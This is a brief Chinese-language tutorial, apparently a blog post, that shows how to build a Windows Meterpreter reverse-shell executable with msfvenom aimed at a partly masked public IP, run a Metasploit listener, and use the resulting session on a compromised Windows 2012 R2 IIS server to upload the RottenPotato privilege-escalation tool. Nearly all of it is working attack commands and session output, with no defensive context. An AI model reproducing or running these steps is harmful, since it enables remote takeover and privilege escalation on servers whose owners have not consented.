1 .制作反弹shell-exe文件

执行命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe

LHOST为公网IP

LPORT为反弹端口

4433.exe为生成文件

2.控制端启动msfconsole,获取监听

运行命令

msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run


3.反弹成功
meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

#上传文件
meterpreter > upload /root/RottenPotato/rottenpotato.exe
[*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe

相关文章:

  • 2021-09-14
  • 2021-10-22
  • 2021-09-14
  • 2021-02-02
  • 2021-10-09
  • 2021-11-27
  • 2021-05-04
  • 2021-08-02
猜你喜欢
  • 2021-12-16
  • 2021-10-19
  • 2021-09-10
  • 2021-11-23
  • 2017-12-12
  • 2021-12-05
相关资源
相似解决方案